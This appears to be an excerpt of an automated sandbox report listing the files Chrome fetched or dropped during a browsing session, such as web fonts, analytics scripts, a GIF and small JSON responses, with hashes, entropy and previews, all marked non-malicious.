                                                                                                                                                                              SHA-512:6479A57FA5560B30EB15964EF20FEA1D0A57974C6A6C6B7B4E856ADDC4DB179E1398C279E0959411FF3CD9091582C6F430318E3B9183BF002DA7D8287EA58563
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:"https://fonts.googleapis.com/css?family=Abril+Fatface%7CCodystar%7CEconomica%7CFredoka+One%7CGive+You+Glory%7CHammersmith+One%7CHappy+Monkey%7CJosefin+Slab%7CKavoon%7CKranky%7CLato%7CMerriweather%7CMonoton%7CMontserrat%7COpen+Sans%7CPermanent+Marker%7CRaleway%7CRammetto+One%7CRoboto%7CRock+Salt%7CSarina%7CSatisfy%7CSource+Code+Pro%7CUbuntu%7CVolkhov%7CYesteryear,"
                                                                                                                                                                              Preview:/* latin-ext */.@font-face {. font-family: 'Abril Fatface';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/abrilfatface/v23/zOL64pLDlL1D99S8g8PtiKchq-lmjdLh.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Abril Fatface';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/abrilfatface/v23/zOL64pLDlL1D99S8g8PtiKchq-dmjQ.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Codystar';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/codystar/v17/FwZY7-Q1xVk-40qxOu
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (15321)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):260032
                                                                                                                                                                              Entropy (8bit):5.4595267508983225
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:22513F051790A4204D71B4EF082ACD93
                                                                                                                                                                              SHA1:A6D6803C5D992EB52FCEDC797439C2F3401F9C01
                                                                                                                                                                              SHA-256:F5CB76971601C9C11942681E7B51BF23723993E28376516B0A3D849EEE0B8387
                                                                                                                                                                              SHA-512:3B29937CFD6102C26513046EB694A401CCF526E462E927300D8ED3B7D29676FD1AC431F11DEDF2CB3C5563BFD1B1687F581471D622979F634F97426B66DA87DD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:/*1736501243,,JIT Construction: v1019252912,en_US*/../**. * Copyright (c) 2017-present, Facebook, Inc. All rights reserved.. *. * You are hereby granted a non-exclusive, worldwide, royalty-free license to use,. * copy, modify, and distribute this software in source code or binary form for use. * in connection with the web services and APIs provided by Facebook.. *. * As with any software that integrates with the Facebook platform, your use of. * this software is subject to the Facebook Platform Policy. * [http://developers.facebook.com/policy/]. This copyright notice shall be. * included in all copies or substantial portions of the software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS. * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR. * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER. * IN AN ACTION OF CO
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1435
                                                                                                                                                                              Entropy (8bit):7.8613342322590265
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                                              SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                                              SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                                              SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                              Entropy (8bit):2.8150724101159437
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3A0DFBC46518C1EEB1DC3FB16388FC45
                                                                                                                                                                              SHA1:A0C4515D4671CC03518FE0CDD237F87E9C56DA58
                                                                                                                                                                              SHA-256:F87687BAD5232B16D162CC310C75511907ED971E7281B5CED5C3AFA440DAAB40
                                                                                                                                                                              SHA-512:BA6E0F5A7F1E5E4CF764FD6945C1A76C4E7F06B684614E396501D238991A8CF2F9033813ADCFABAE96824820B425C1E3DCEF5C6821E44F6D7EDD7D4278EEA7EF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://engine-us.montiapm.com/simplentp/sync?noCache=1736508274249-0.9820952703338532
                                                                                                                                                                              Preview:1736508276227
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:GIF image data, version 89a, 725 x 648
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):3134457
                                                                                                                                                                              Entropy (8bit):7.9863331987761335
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D1F9D6C5121CBA258D115380F2FE7DE9
                                                                                                                                                                              SHA1:561E07A584CCD7983BF00A5F11D982547B648FE6
                                                                                                                                                                              SHA-256:5EB4AD2EF02008EF6CDA8A62DE9877918B6C95C6C703D8097C0426C6C5EAFA9C
                                                                                                                                                                              SHA-512:5AC90657764350C28C5340C2708261D66FADC167EB88C5ADA5D9F35EF18319F5A912E810107CFCAAEB41241198FDAE07B00DC9EAF0604717F186D8592192DF55
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://d2dzu5rf27gdz3.cloudfront.net/analytics/analytics-dashboard.gif
                                                                                                                                                                              Preview:GIF89a............#.GT.37....P\.v.... ..!=:&..'}.+OS.m./0//D=4]d=<:>fm?yB@..AGDBTLH^]H.JUJKZPK.RK..LJKN.9S]OTTSTqsWGaWbRW..Yf^Z[\Z.[Mk].da.daddmbd.PfeKg..h.hjolm]zn|wn..p.yrstr..s.xs.yvez.{mL||||..~m.............X..u..............L...........q.......q.........~...>...................q....I...P......................U....e7.:A.I..................\#............vJ...........lj....i.......i8.T....k..............l.........................J.m!..........C..wB.....p...........W.4...............G............K..P.......................9..5.......t....<..=..A..'...e..x.........'..;....................O.............................H.................j.....W.....k.........................@.............&..R.....?..........JX!..NETSCAPE2.0.....!.......!.&GIF edited with https://ezgif.com/crop.,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]....p......x..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 11048, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):11048
                                                                                                                                                                              Entropy (8bit):7.977076776424122
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5748240D097CEFEB7A7089946377BB71
                                                                                                                                                                              SHA1:EE0280F61D574D71E227B0FD96B1AB07F56F860D
                                                                                                                                                                              SHA-256:15057FEF797F7F64D90CF20C4647E2697C3EC75B4094C3D3FAA9BB3C1124F1E8
                                                                                                                                                                              SHA-512:3DA8029C30B4599725E44781EA931216C9AFD64E3F2DA84C79BC19EFD2CD754C1462E4FB00CA0BAC053F8C620328D947C4FA7DAEEBB77EBD57EAA33549CEA075
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/sourcecodepro/v23/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DMyQtMlrTA.woff2
                                                                                                                                                                              Preview:wOF2......+(......YX..*..............................n....`?STATH..R......./..V..6.$..V. ..". ....F...#..`T.h..t.Q.0JM...`....L=..:..7.P.....r..%`aXe...a .....&{.8$1...,....F.!...%.....=;......<...s.c..K=..s.^.^..vQ..%.. .....5..?....<.P$PI..i....I>b.W.....0..L.R....f...a....=W8..p3..L..8.8.4..y....g...d.`.L.k..~..M#.@.7...].W5.n.%.....2.d....Lk.....'@..~M|......\..3..\:59%...g(..R.K2e.lw.....?.....|............|2..(.....7..,...H...@.\.A.d...W.t)St.7M..?Q.s.<....[*Q[,...|D....~H..b/...a...2.qUv..N.b)...C.=.o.S.M$...2.2.N\.:. H....h.....'.)AdE......'..-. ..!.:z.(Q........2.rtF..B.\.b..C.C.C..BCD.......@..x.#...eh.B.o.z.@.w.P.5..D.w......^....{A.w....u..-.,..7.......2..@(.7..44.j..@.b..5#3...$$'+..G..U..^L...g.h:Jb|...\.}-ic<...../...Ft....q.a{m..O..Ve...c3..$c.8#V6.R.!..<Q......^...j@...aj..t.-......t<...!_n...H.|.....K1.u...=(.ix&...Av..{.....F!Pg!Hn.`%J..a.a....%.+.I..4.9..S..B/]j<S.D!..%c/$.B32..~'E%..E..s.0M.>.<8........K?cL....>s~..z..i
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                              SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                              SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                              SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:{}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2963)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3013
                                                                                                                                                                              Entropy (8bit):5.240877267461699
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4F5ECE9ED5B2B3BD862C9D67B60884AF
                                                                                                                                                                              SHA1:BB2020DA187372D2D16B5D76B2850DA3D0842325
                                                                                                                                                                              SHA-256:9E2189D573B1DF3FD3C684BA1F9AD2AD5CD2F8394F14DDE87B5FDE495BEA200C
                                                                                                                                                                              SHA-512:123677686FD9EBB5B2420EA284DE48159C827F97841C51B46092C1445C715A8DBD53A98B5EFAAEB600F69EEABBA90F4E076B578BCBAB9760BA183F0BAD81FEBC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:window['google-tag-managerDeps'] = ["/integrations/vendor/commons.a61d7bea37d2de5d4b69.js"];window['google-tag-managerLoader'] = function() { return window["google-tag-managerIntegration"]=function(t){function e(e){for(var n,i,s=e[0],p=e[1],c=e[2],l=0,g=[];l<s.length;l++)i=s[l],Object.prototype.hasOwnProperty.call(o,i)&&o[i]&&g.push(o[i][0]),o[i]=0;for(n in p)Object.prototype.hasOwnProperty.call(p,n)&&(t[n]=p[n]);for(u&&u(e);g.length;)g.shift()();return a.push.apply(a,c||[]),r()}function r(){for(var t,e=0;e<a.length;e++){for(var r=a[e],n=!0,s=1;s<r.length;s++){var p=r[s];0!==o[p]&&(n=!1)}n&&(a.splice(e--,1),t=i(i.s=r[0]))}return t}var n={},o={59:0},a=[];function i(e){if(n[e])return n[e].exports;var r=n[e]={i:e,l:!1,exports:{}};return t[e].call(r.exports,r,r.exports,i),r.l=!0,r.exports}i.m=t,i.c=n,i.d=function(t,e,r){i.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},i.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{valu
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):49911
                                                                                                                                                                              Entropy (8bit):7.994516776763163
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                                                                                              SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                                                                                              SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                                                                                              SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 21916, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):21916
                                                                                                                                                                              Entropy (8bit):7.990536803846798
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:FC7BBEC71EE0D20756CB2D208368D448
                                                                                                                                                                              SHA1:5F76A4AF445914BD65F0A562995EF8443AA2BCBB
                                                                                                                                                                              SHA-256:9420EA999F4EFA11BEA285589689612389638EFB03B4FB20DEF549A51062F2ED
                                                                                                                                                                              SHA-512:9B92558341E903133AC571FB1E528EE973992D820D13FCE030A7609C98D6A71D3B17F2142C8DBDEB11C21F69ED80DB40154CC15EED66EA3E7462439DA45ED95F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/rammettoone/v19/LhWiMV3HOfMbMetJG3lQDppNNfGd.woff2
                                                                                                                                                                              Preview:wOF2......U..........U7.............................<....`..l.L........8..*..V..6.$..(. .....]..2. .5.._.....\..~.;...AH.hg.....X.x...?%A...%..N_.r....;z.t.+.0.Pz.c.lj&=.cNY+c2.g~."V,..Jx..=].....g.... V&-.{......z.G.....p..@..RH.9'.F.o:...Ha2..qX....2/.qU.r$.B........7.u....Qs.=....9..%..B...A......,P..........P...Z*...............U. .....:......0=..G=.....C5......./..l...&..V.6B.J..B$.I..U,i=....8...\R...JIc......`n...A........m..6X.0V.f..Q!m.Fb..W0.../bT....'7...G.PW..M ....W)*..x..Ob!....tl.....)-....N*...=.'............)e....>v..(...^Q.w.0g..MW._.J..Y..%P...H..@y.....!=...gC.J3G{...).d..(.tZ...$T.t[.f..k]).m.q.4.'.]<....=.r..S.....9.93!g...6../..)..v.Dov .a.)..#7.fIB.&.].........uo".v'f.{........H...:&.fO%.R......"L..M..}w...._$..M..u.P4$...!.h....}o.af0 .A.(.!B...Lm.....HyIP....?.@n.6.)...9U.v..)]...W{..qQ..z....i..]\.n..N...~l.j..I................&..La'..{=....9..=.eiR.Lf..lP.I;.l....tO......................5S{.."...u.....T..)9$..%kf0
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                              Entropy (8bit):4.241202481433726
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                              SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                              SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                              SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):680
                                                                                                                                                                              Entropy (8bit):5.730505153244531
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:EE23424AF96C4BC8C8EA3A7298BEF491
                                                                                                                                                                              SHA1:855711FF2EB56324C524ACF4A6B695D388FC3E90
                                                                                                                                                                              SHA-256:F3E2EA6F5311DD6DCF3C3039DDB48452E7B1D45D641A34B106ADB7B053C6C8E1
                                                                                                                                                                              SHA-512:69AE1A26C36750DDDB8661468000C7FABC05E027A4B544A546C85D3BEB24CB0634E04CEDA707DE1E909BB2B3ACB916CC2EE98A6341315082E0A9B4CBBC4BDC3A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://auth.split.io/api/v2/auth?users=anonymous-TkQPQssWcB2GwbKug
                                                                                                                                                                              Preview:{"pushEnabled":true,"token":"eyJhbGciOiJIUzI1NiIsImtpZCI6IkRQVkE3QS44czhnaVEiLCJ0eXAiOiJKV1QifQ.eyJ4LWFibHktY2FwYWJpbGl0eSI6IntcIk5UQTJOVEE0T1RjeV9NemcyTkRFd09EUXdOdz09X2NvbnRyb2xcIjpbXCJzdWJzY3JpYmVcIl0sXCJOVEEyTlRBNE9UY3lfTXpnMk5ERXdPRFF3Tnc9PV9teVNlZ21lbnRzXCI6W1wic3Vic2NyaWJlXCJdLFwiTlRBMk5UQTRPVGN5X016ZzJOREV3T0RRd053PT1fc3BsaXRzXCI6W1wic3Vic2NyaWJlXCJdLFwiY29udHJvbF9wcmlcIjpbXCJzdWJzY3JpYmVcIixcImNoYW5uZWwtbWV0YWRhdGE6cHVibGlzaGVyc1wiXSxcImNvbnRyb2xfc2VjXCI6W1wic3Vic2NyaWJlXCIsXCJjaGFubmVsLW1ldGFkYXRhOnB1Ymxpc2hlcnNcIl19IiwieC1hYmx5LWNsaWVudElkIjoiY2xpZW50SWQiLCJleHAiOjE3MzY1MTE4MDgsImlhdCI6MTczNjUwODIwOH0._txFYGV1w7HBJOxTz1140u_JlEntXmBlTJt0MEhkJwI","connDelay":60}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):99
                                                                                                                                                                              Entropy (8bit):4.661606559596621
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8142F2B702D3390B151F7A4F5F716561
                                                                                                                                                                              SHA1:1085A3B8B32CFDD084A7071AE130DC895C6B8B92
                                                                                                                                                                              SHA-256:68A004596BE19E100F157B2694EEA78822CF251DD98BB759D11971BD3F1E6714
                                                                                                                                                                              SHA-512:99F7D3B5EFE97E72D11422AADD5A33661162FD01D5651C19A306A7ECB1B1BC7303DA10A7DC711F63CC79A383C726199E916E4DA6CBA6B10816FB2AC7A2B5ABB5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://app.planable.io/manifest.json
                                                                                                                                                                              Preview:{. "gcm_sender_id": "482941778795",. "gcm_sender_id_comment": "Do not change the GCM Sender ID".}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (9198)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):9270
                                                                                                                                                                              Entropy (8bit):5.141086013932976
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:00E9C65CBBA11C07C4BF4A6E2727B8EA
                                                                                                                                                                              SHA1:AC1A5D9B6FFCDE916A82169CD74C9A734BDF4A39
                                                                                                                                                                              SHA-256:129151ED0140041B198CE3B364A11861A3B5BAA5BB60475EBF7BEDB9B0FC94D6
                                                                                                                                                                              SHA-512:6C142FA3DE8B0452530D3E0DA7AF3B2CFCA2F0292282E07FF3AEF71426E791B650A8EDE02B5626B7ECF177B45B86630DACDDE9F9480B639E01C7B9D994535D2B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://segment.planable.io/analytics-next/bundles/ajs-destination.bundle.ed53a26b6edc80c65d73.js
                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[464],{9254:function(t,n,i){function e(t,n){var i,e;return"boolean"==typeof(null==n?void 0:n.enabled)?n.enabled:null===(e=null===(i=null==t?void 0:t.__default)||void 0===i?void 0:i.enabled)||void 0===e||e}i.d(n,{n:function(){return e}})},3162:function(t,n,i){i.r(n),i.d(n,{LegacyDestination:function(){return G},ajsDestinations:function(){return S}});var e=i(5163),r=i(4122),o=i(94),s=i(8404),a=i(1494),u=i(204),c=i(6096),l=i(9254),d=i(5944),h=i(8044),v=i(3098),f=i(3061),p=i(6338),m=i(7566),g=i(7070);function y(t){return t.toLowerCase().replace(".","").replace(/\s+/g,"-")}function w(t,n){return void 0===n&&(n=!1),n?btoa(t).replace(/=/g,""):void 0}function b(t,n,i,r){return(0,e.mG)(this,void 0,Promise,(function(){var o,s,a,u,c,l;return(0,e.Jh)(this,(function(d){switch(d.label){case 0:o=y(n),s=w(o,r),a=(0,m.Kg)(),u="".concat(a,"/integrations/").concat(null!=s?s:o,"/").concat(i,"/").conc
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 10316, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):10316
                                                                                                                                                                              Entropy (8bit):7.972560416119631
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7444E1EBF4108A9292212AB2971F5E42
                                                                                                                                                                              SHA1:440165ADE6A26DF65B4E2DE9E63332BB8A7967EA
                                                                                                                                                                              SHA-256:F2B0048E8820A1FBB93CBDAE0E0732C1E1C819E4526108B0B76F89E58F8F15F8
                                                                                                                                                                              SHA-512:4D6AD0A3E55A46EA84327C882B31FCCC4324B9E2E8BA46EF4ECAD59E31E23340A90B2AF8103D481172958CB2CEE65418CA599F4B06AFA0AB8FB921404C36715D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/economica/v15/Qw3fZQZaHCLgIWa29ZBbNsIB.woff2
                                                                                                                                                                              Preview:wOF2......(L......\...'................................<.`..<.......w..F..6.$.... ..........F3......y.DQ.7......!....pD.0..*...Q,..jm....?..p...7;...$>B..vx~n..H`.`..c.`..1`.K.1FkSi...... Vbb..x.Fc%(zV...c......R.Dsi.)..\$..V.$B..ys.%.,J......v..e2.Mw........t5'..6.a.lk...].t........&.tQ...O. .....&.....U.u.e_.......U.O..@!;`..\......V....w?.a...".|9.......l.l%.8.*..$....[9P...|......0l...u9.1....Ni.&..!g....].....fc...v....X.....c# @n.ny.n...!D...*F.....P!<.7.i.7.(........dvdq.S.O....|..m..v.Q+...|uj...qE.PPR...M.....K.....i.$E7.......7$s.\.. ...kd"....V......?..'...M......W...!8.v...4..;....Aa.nGb`;..-..kZ.-s.`.F....7......F0....@.4..ET1@C.0.F...i..M......F....#.....G..Q.WA.3...9=|.B..A$...+...q..&...............$.k........=...X%H1.".,...ok........Q....Q. .^...p._..k..y.a..uiG.....LeA.# .4K ..l..t.P0...?.'......Ac1X!,6..f.Y;..l..?.w.]..).}Y....h.).}..."c...7...=......`a x......C...YO.e......N..|..p...6..0!..dBD.....@..X\..p.!.%.. 1N.. 1..D.-.......?RP.0.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (25245)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):25246
                                                                                                                                                                              Entropy (8bit):4.02663208613348
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8219DD37BB0283F9755BDDED0C9F2D22
                                                                                                                                                                              SHA1:30F6DFA2E62BF39E67ECBA22E012EDECCA29F9DD
                                                                                                                                                                              SHA-256:C8879B289784C2F0E524C601EE26BD458AB9D35A527C22CE582904004E47D018
                                                                                                                                                                              SHA-512:C8455AC979A15AFA586E05D104E268D5DFD5B620376F62814AC709852D3B214F1A8E7F22EBB1BF52654148644BD7BD9EE8AC5E940848580EBCBCEA887455BEA1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://snap.licdn.com/li.lms-analytics/insight.min.js
